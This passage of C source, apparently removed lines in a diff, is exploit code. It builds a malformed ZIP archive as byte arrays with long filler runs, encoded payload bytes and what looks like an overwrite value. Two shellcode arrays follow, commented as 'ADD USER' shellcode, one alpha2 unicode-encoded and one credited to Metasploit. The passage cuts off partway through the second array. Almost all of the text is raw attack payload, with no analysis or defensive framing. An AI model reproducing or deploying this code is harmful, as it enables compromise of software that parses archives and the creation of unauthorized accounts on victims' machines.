-"\x76\x64\x73\x71\x6F\x69\x75\x68\x7A\x67\x66\x6F\x69\x68\x73\x64"
-"\x71\x6F\x69\x75\x68\x67\x7A\x65\x71\x6F\x69\x68\x67\x73\x71\x6F"
-"\x69\x68\x67\x7A\x61\x65\x7A\x72\x75\x79\x61\x75\x79\x74\x61\x65"
-"\x70\x69\x75\x79\x55\x59\x54\x4F\x5A\x52\x45\x50\x49\x48\x47\x41"
-"\x5A\x55\x59\x56\x44\x53\x4F\x49\x59\x54\x41\x50\x4F\x49\x55\x45"
-"\x59\x52\x49\x55\x45\x5A\x59\x47\x42\x4B\x4A\x43\x58\x4E\x4B\x56"
-"\x4E\x4B\x43\x58\x42\x57\x56\x4B\x4A\x4E\x42\x43\x58\x48\x42\x4B"
-"\x4A\x44\x48\x46\x4F\x49\x48\x5A\x45\x52\x4F\x49\x55\x48\x45\x5A"
-"\x55\x49\x4F\x41\x42\x45\x5A\x55\x49\x42\x47\x55\x49\x56\x43\x50"
-"\x4C\x44\x53\x47\x57\x4B\x52\x54\x42\x4E\x49\x55\x43\x49\x55\x4F"
-"\x51\x45\x42\x48\x52\x55\x49\x59\x44\x46\x51\x50\x5A\x49\x55\x45"
-"\x52\x50\x49\x55\x44\x59\x46\x54\x50\x41\x49\x5A\x55\x45\x59\x52"
-"\x5A\x45\x55\x48\x52\x54\x49\x55\x50\x56\x58\x57\x4B\x4A\x43\x4E"
-"\x48\x42\x47\x50\x46\x4F\x49\x55\x50\x41\x49\x52\x59\x45\x5A\x4F"
-"\x41\x49\x54\x59\x38\x37\x33\x32\x39\x35\x36\x35\x39\x34\x38\x33"
-"\x32\x36\x35\x46\x53\x34\x38\x59\x46\x44\x53\x39\x38\x59\x55\x56"
-"\x47\x30\x39\x38\x51\x59\x55\x52\x30\x39\x38\x34\x59\x35\x32\x33"
-"\x39\x38\x41\x59\x39\x46\x38\x45\x51\x59\x5A\x35\x39\x38\x59\x36"
-"\x39\x38\x46\x47\x59\x39\x38\x51\x59\x39\x47\x46\x44\x53\x55\x59"
-"\x30\x39\x48\x34\x5A\x48\x33\x37\x38\x35\x32\x33\x31\x42\x34\x47"
-"\x38\x30\x47\x46\x44\x53\x55\x49\x42\x56\x51\x49\x55\x4F\x59\x50"
-"\x52\x39\x5A\x48\x46\x44\x53\x51\x55\x49\x47\x46\x47\x44\x55\x53"
-"\x53\x53\x53\x53\x45\x47\x46\x39\x32\x47\x35\x33\x34\x55\x47\x46"
-"\x39\x49\x53\x50\x47\x42\x55\x54\x50\x5A\x39\x38\x59\x35\x33\x41"
-"\x41\x42\x43\x43\x46\x52\x45\x43\x43\x45\x54\x52\x45\x5A\x47\x52"
-"\x46\x44\x53\x49\x4F\x5A\x48\x45\x52\x42\x4E\x4F\x56\x46\x44\x53"
-"\x4F\x49\x52\x48\x54\x4F\x5A\x49\x4E\x46\x47\x44\x4B\x4E\x46\x43"
-"\x58\x4C\x4B\x59\x89\x05\x8A\x9B\x98\x98\x98\x4F\x49\x49\x49\x49"
-"\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42"
-"\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48"
-"\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44"
-"\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F\x4D\x4E\x4F\x4C\x36\x4B"
-"\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x42\x36\x4B"
-"\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45\x44\x4E\x43\x4B\x38\x4E"
-"\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B\x48\x4F\x34\x4A\x51\x4B"
-"\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49\x44\x4B\x38\x46\x43\x4B"
-"\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49\x59\x4E\x4A\x46\x58\x42"
-"\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D\x30\x41\x30\x44\x4C\x4B"
-"\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A\x52\x45\x57\x45\x4E\x4B"
-"\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48\x36\x4B\x58\x4E\x50\x4B"
-"\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B\x4E\x43\x30\x4E\x52\x4B"
-"\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41\x36\x43\x4C\x41\x43\x4B"
-"\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B\x48\x42\x44\x4E\x50\x4B"
-"\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42\x44\x4A\x30\x50\x45\x4A"
-"\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42\x35\x4F\x4F\x48\x4D\x48"
-"\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44\x33\x4A\x56\x47\x37\x43"
-"\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42\x4D\x4A\x36\x4B\x4C\x4D"
-"\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48\x4D\x4F\x45\x49\x58\x45"
-"\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44\x30\x45\x35\x4C\x36\x44"
-"\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49\x50\x45\x4F\x4D\x4A\x47"
-"\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43"
-"\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42\x4D\x48\x46\x4A\x56\x41"
-"\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41\x4E\x45\x59\x4A\x46\x46"
-"\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F\x4F\x48\x4D\x4C\x36\x42"
-"\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x46\x4A\x4D\x4A\x50"
-"\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43\x55\x45\x45\x4F\x4F\x42"
-"\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49\x44\x47\x45\x4F\x4F\x48"
-"\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F\x4F\x42\x4D\x43\x39\x4A"
-"\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47\x45\x4F\x4F\x48\x4D\x45"
-"\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46\x36\x48\x36\x4A\x56\x43"
-"\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42\x45\x49\x35\x49\x32\x4E"
-"\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49\x58\x44\x4E\x41\x43\x42"
-"\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D\x32\x50\x4F\x44\x34\x4E"
-"\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B\x4A\x4B\x4A\x4B\x4A\x4A"
-"\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F\x4F\x45\x37\x46\x44\x4F"
-"\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4C"
-"\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4F\x4F\x42\x4D\x4A"
-"\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43\x55\x4F\x4F\x48\x4D\x4C"
-"\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42\x4D\x4B\x48\x47\x45\x4E"
-"\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48\x4D\x44\x45\x4F\x4F\x42"
-"\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F\x45\x43\x55\x4F\x4F\x48"
-"\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61\x82\xFD\x81\x98\x98\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x2E\x74"
-"\x78\x74\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC"
-"\xCE\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08"
-"\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
-"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
-"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x43\x43\x43\x43\x43\x43\x43\x43\x43"
-"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x41\x42\x43\x44\x45\x58\x58\x58\x58\x41\x41\x41\x41";
-
-  char file_2[]=
-"\x41\x41\x41\x41\xCC\xCC\xCC\xCC\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4A\x4A\x4A\x4A\x4A\x4A"
-"\x4A\x4A\x4A\x4A\x4A\x4A\x4A\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B"
-"\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C"
-"\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x4D\x4D\x4D\x4D\x4D\x4D\x4D\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E"
-"\x4E\x4E\x4E\x4E\x4E\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4F\x4F\x4F\x4F"
-"\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x50\x50\x50\x50\x50\x50"
-"\x50\x50\x50\x50\x50\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x51\x51\x51\x51\x51\x51\x51"
-"\x51\x51\x32\x32\x32\x32\x32\x89\x03\x59\x89\x05\x8A\x9B\x98\x98"
-"\x98\x4F\x49\x49\x49\x49\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30"
-"\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56"
-"\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42"
-"\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F"
-"\x4D\x4E\x4F\x4C\x36\x4B\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F"
-"\x4F\x4F\x4F\x42\x36\x4B\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45"
-"\x44\x4E\x43\x4B\x38\x4E\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B"
-"\x48\x4F\x34\x4A\x51\x4B\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49"
-"\x44\x4B\x38\x46\x43\x4B\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49"
-"\x59\x4E\x4A\x46\x58\x42\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D"
-"\x30\x41\x30\x44\x4C\x4B\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A"
-"\x52\x45\x57\x45\x4E\x4B\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48"
-"\x36\x4B\x58\x4E\x50\x4B\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B"
-"\x4E\x43\x30\x4E\x52\x4B\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41"
-"\x36\x43\x4C\x41\x43\x4B\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B"
-"\x48\x42\x44\x4E\x50\x4B\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42"
-"\x44\x4A\x30\x50\x45\x4A\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42"
-"\x35\x4F\x4F\x48\x4D\x48\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44"
-"\x33\x4A\x56\x47\x37\x43\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42"
-"\x4D\x4A\x36\x4B\x4C\x4D\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48"
-"\x4D\x4F\x45\x49\x58\x45\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44"
-"\x30\x45\x35\x4C\x36\x44\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49"
-"\x50\x45\x4F\x4D\x4A\x47\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43"
-"\x35\x43\x35\x43\x35\x43\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42"
-"\x4D\x48\x46\x4A\x56\x41\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41"
-"\x4E\x45\x59\x4A\x46\x46\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F"
-"\x4F\x48\x4D\x4C\x36\x42\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A"
-"\x56\x46\x4A\x4D\x4A\x50\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43"
-"\x55\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49"
-"\x44\x47\x45\x4F\x4F\x48\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F"
-"\x4F\x42\x4D\x43\x39\x4A\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47"
-"\x45\x4F\x4F\x48\x4D\x45\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46"
-"\x36\x48\x36\x4A\x56\x43\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42"
-"\x45\x49\x35\x49\x32\x4E\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49"
-"\x58\x44\x4E\x41\x43\x42\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D"
-"\x32\x50\x4F\x44\x34\x4E\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B"
-"\x4A\x4B\x4A\x4B\x4A\x4A\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F"
-"\x4F\x45\x37\x46\x44\x4F\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41"
-"\x35\x41\x45\x41\x35\x4C\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41"
-"\x45\x4F\x4F\x42\x4D\x4A\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43"
-"\x55\x4F\x4F\x48\x4D\x4C\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42"
-"\x4D\x4B\x48\x47\x45\x4E\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48"
-"\x4D\x44\x45\x4F\x4F\x42\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F"
-"\x45\x43\x55\x4F\x4F\x48\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61"
-"\x82\xFD\x81\x98\x98\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x32\x32\x32\x32\x2E\x74\x78\x74\x50\x4B\x05\x06\x00\x00\x00\x00"
-"\x01\x00\x01\x00\x42\x08\x00\x00\x32\x08\x00\x00";
-
-
- char shellcode_1[]=
-   // Skylined's alpha2 unicode decoder
-   //Un-encoded ADD USER shellcode
-                    "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABA"
-                    "BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
-        // Encoded opcodes
-                    "ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDKoDTKKQXnnQ7P4Y4lU4upptm7i1WZLM"
-                    "kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBkMLRkzajKQyQLmTM45sNQUpotRkmplp"
-                    "tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMlaOlqhvqPPVriJXCS5pCKNpOxJO8Nk0"
-                    "C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRUpsqUPrmP%skp%s"
-                    "mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQotPmoyPn1YT3ptT2aQPtpo1bBSkp%s"
-                    "MPNOOQa4oTkPA";
-  //ADD USER shellcode TNX to metasploit                  
- char shellcode_2[]=
-                    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
-                    "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
-                    "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
-                    "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
-                    "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
-                    "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
-                    "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
-                    "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
-                    "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
-                    "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
-                    "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
-                    "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
-                    "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
-                    "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
-                    "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
-                    "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
-                    "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
-                    "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
